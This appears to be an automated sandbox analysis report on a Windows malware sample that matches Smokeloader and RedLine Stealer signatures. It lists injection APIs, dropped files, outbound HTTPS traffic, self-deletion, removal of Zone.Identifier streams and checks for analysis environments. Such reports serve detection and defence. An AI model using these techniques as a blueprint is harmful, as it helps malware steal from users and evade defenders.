              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
              Source: unknownHTTPS traffic detected: 23.145.40.181:443 -> 192.168.2.4:49791 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.145.40.181:443 -> 192.168.2.4:49875 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: Yara matchFile source: 7.3.7E95.exe.890000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.7E95.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.7E95.exe.880e67.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000003.2776796462.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1983365123.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2828263113.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2828387793.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1983398685.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1741413707.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1741803649.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Source: 00000005.00000002.1983365123.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000005.00000002.1983346956.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
              Source: 00000007.00000002.2828263113.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000000.00000002.1741605367.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
              Source: 00000007.00000002.2828387793.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000005.00000002.1983398685.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000000.00000002.1741413707.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000005.00000002.1983485699.0000000000A7C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
              Source: 00000007.00000002.2828242020.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
              Source: 00000007.00000002.2828537263.0000000000A3C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
              Source: 00000000.00000002.1741803649.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000000.00000002.1741369636.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
              Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_00401546 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401546
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_00403135 RtlCreateUserThread,NtTerminateProcess,0_2_00403135
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_00401545 NtAllocateVirtualMemory,0_2_00401545
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_00401551 NtAllocateVirtualMemory,0_2_00401551
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_00401652 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401652
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_0040165E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040165E
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_00401563 NtAllocateVirtualMemory,0_2_00401563
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_0040166A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040166A
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_0040227B NtQuerySystemInformation,NtQuerySystemInformation,0_2_0040227B
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_0040327E RtlCreateUserThread,NtTerminateProcess,0_2_0040327E
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_00401617 NtAllocateVirtualMemory,0_2_00401617
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_00401582 NtAllocateVirtualMemory,0_2_00401582
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_0040158C NtAllocateVirtualMemory,0_2_0040158C
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_00401590 NtAllocateVirtualMemory,0_2_00401590
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_00401691 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401691
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_004025B8 NtEnumerateKey,NtEnumerateKey,NtClose,0_2_004025B8
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_00401546 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401546
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_00403135 RtlCreateUserThread,NtTerminateProcess,5_2_00403135
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_00401545 NtAllocateVirtualMemory,5_2_00401545
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_00401551 NtAllocateVirtualMemory,5_2_00401551
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_00401652 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401652
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_0040165E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_0040165E
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_00401563 NtAllocateVirtualMemory,5_2_00401563
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_0040166A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_0040166A
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_0040227B NtQuerySystemInformation,NtQuerySystemInformation,5_2_0040227B
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_0040327E RtlCreateUserThread,NtTerminateProcess,5_2_0040327E
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_00401617 NtAllocateVirtualMemory,5_2_00401617
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_00401582 NtAllocateVirtualMemory,5_2_00401582
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_0040158C NtAllocateVirtualMemory,5_2_0040158C
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_00401590 NtAllocateVirtualMemory,5_2_00401590
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_00401691 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401691
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_004025B8 NtEnumerateKey,NtEnumerateKey,NtClose,5_2_004025B8
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_00402F78 RtlCreateUserThread,NtTerminateProcess,7_2_00402F78
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_0040151A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_0040151A
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_00401543 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_00401543
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_00401547 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_00401547
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_0040154A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_0040154A
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_00401558
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_00403306 GetModuleHandleA,CreateFileW,GetForegroundWindow,NtMapViewOfSection,NtAllocateVirtualMemory,NtDuplicateObject,NtQuerySystemInformation,NtQueryInformationProcess,NtOpenKey,NtQueryKey,NtEnumerateKey,RtlCreateUserThread,strstr,wcsstr,tolower,towlower,7_2_00403306
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_00401707 NtMapViewOfSection,7_2_00401707
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_00401525 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_00401525
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_00403127 RtlCreateUserThread,NtTerminateProcess,7_2_00403127
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_00401539 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_00401539
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_00402FD6 RtlCreateUserThread,NtTerminateProcess,7_2_00402FD6
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_004014DC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004014DC
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_004025B80_2_004025B8
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_0041C1100_2_0041C110
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_004025B85_2_004025B8
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_0041C1105_2_0041C110
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_004033067_2_00403306
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_0041D2407_2_0041D240
              Source: C:\Users\user\AppData\Roaming\wrhivcvCode function: 8_2_0041D2408_2_0041D240
              Source: C:\Users\user\AppData\Roaming\wrhivcvCode function: 8_2_0040217E8_2_0040217E
              Source: F8FA.exe.1.drStatic PE information: Data appended to the last section found
              Source: 3WaqgS34S7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 00000005.00000002.1983365123.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000005.00000002.1983346956.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
              Source: 00000007.00000002.2828263113.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000000.00000002.1741605367.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
              Source: 00000007.00000002.2828387793.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000005.00000002.1983398685.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000000.00000002.1741413707.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000005.00000002.1983485699.0000000000A7C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
              Source: 00000007.00000002.2828242020.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
              Source: 00000007.00000002.2828537263.0000000000A3C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
              Source: 00000000.00000002.1741803649.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000000.00000002.1741369636.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.troj.evad.winEXE@6/5@9/5
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_009F0939 CreateToolhelp32Snapshot,Module32First,0_2_009F0939
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vdhivcvJump to behavior
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F8FA.tmpJump to behavior
              Source: 3WaqgS34S7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 3WaqgS34S7.exeReversingLabs: Detection: 63%
              Source: 3WaqgS34S7.exeVirustotal: Detection: 51%
              Source: unknownProcess created: C:\Users\user\Desktop\3WaqgS34S7.exe "C:\Users\user\Desktop\3WaqgS34S7.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\vdhivcv C:\Users\user\AppData\Roaming\vdhivcv
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7E95.exe C:\Users\user\AppData\Local\Temp\7E95.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\wrhivcv C:\Users\user\AppData\Roaming\wrhivcv
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7E95.exe C:\Users\user\AppData\Local\Temp\7E95.exeJump to behavior
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeSection loaded: msvcr100.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\vdhivcvSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\vdhivcvSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\vdhivcvSection loaded: msvcr100.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeSection loaded: msvcr100.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\wrhivcvSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeUnpacked PE file: 0.2.3WaqgS34S7.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.voheba:W;.yovu:W;.lobudib:R;.rsrc:R; vs .text:EW;
              Source: C:\Users\user\AppData\Roaming\vdhivcvUnpacked PE file: 5.2.vdhivcv.400000.0.unpack .text:ER;.rdata:R;.data:W;.voheba:W;.yovu:W;.lobudib:R;.rsrc:R; vs .text:EW;
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeUnpacked PE file: 7.2.7E95.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.kona:W;.yip:W;.xijewek:R;.rsrc:R; vs .text:EW;
              Source: C:\Users\user\AppData\Roaming\wrhivcvCode function: 8_2_004050FA LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,8_2_004050FA
              Source: F8FA.exe.1.drStatic PE information: real checksum: 0x3a4d3 should be: 0x35896
              Source: 3WaqgS34S7.exeStatic PE information: section name: .voheba
              Source: 3WaqgS34S7.exeStatic PE information: section name: .yovu
              Source: 3WaqgS34S7.exeStatic PE information: section name: .lobudib
              Source: 7E95.exe.1.drStatic PE information: section name: .kona
              Source: 7E95.exe.1.drStatic PE information: section name: .yip
              Source: 7E95.exe.1.drStatic PE information: section name: .xijewek
              Source: F8FA.exe.1.drStatic PE information: section name: .kona
              Source: F8FA.exe.1.drStatic PE information: section name: .yip
              Source: F8FA.exe.1.drStatic PE information: section name: .xijewek
              Source: wrhivcv.1.drStatic PE information: section name: .kona
              Source: wrhivcv.1.drStatic PE information: section name: .yip
              Source: wrhivcv.1.drStatic PE information: section name: .xijewek
              Source: vdhivcv.1.drStatic PE information: section name: .voheba
              Source: vdhivcv.1.drStatic PE information: section name: .yovu
              Source: vdhivcv.1.drStatic PE information: section name: .lobudib
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_00401B0D push cs; iretd 0_2_00401B89
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_00401B1C push cs; iretd 0_2_00401B89
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_00401AE7 push cs; iretd 0_2_00401B89
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_009A1B83 push cs; iretd 0_2_009A1BF0
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_009A1B4E push cs; iretd 0_2_009A1BF0
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_009A1B74 push cs; iretd 0_2_009A1BF0
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_009F84F2 pushfd ; ret 0_2_009F8500
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_009F3355 push F6381521h; retf 0_2_009F3365
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_009F1E4D push cs; iretd 0_2_009F1E7D
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_009F5C4C push ss; iretd 0_2_009F5C4E
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_009F5C7D push ss; retf 0_2_009F5C7F
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_00401B0D push cs; iretd 5_2_00401B89
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_00401B1C push cs; iretd 5_2_00401B89
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_00401AE7 push cs; iretd 5_2_00401B89
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_009A1B83 push cs; iretd 5_2_009A1BF0
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_009A1B4E push cs; iretd 5_2_009A1BF0
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_009A1B74 push cs; iretd 5_2_009A1BF0
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_00A82045 push F6381521h; retf 5_2_00A82055
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_00A871E2 pushfd ; ret 5_2_00A871F0
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_00A8493C push ss; iretd 5_2_00A8493E
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_00A80B3D push cs; iretd 5_2_00A80B6D
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_00A8496D push ss; retf 5_2_00A8496F
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_00403306 push ecx; retf 91D9h7_2_004036A6
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_00882EF3 push cs; ret 7_2_00882EF4
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_00A44F8E push ss; retf 7_2_00A44F94
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_00A46B62 push esp; retf 7_2_00A46BAA
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_00A44B71 push ecx; ret 7_2_00A44B72
              Source: C:\Users\user\AppData\Roaming\wrhivcvCode function: 8_2_00402789 push ecx; ret 8_2_0040279C
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wrhivcvJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vdhivcvJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F8FA.exeJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7E95.exeJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wrhivcvJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vdhivcvJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\3waqgs34s7.exeJump to behavior
              Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\vdhivcv:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\wrhivcv:Zone.Identifier read attributes | deleteJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
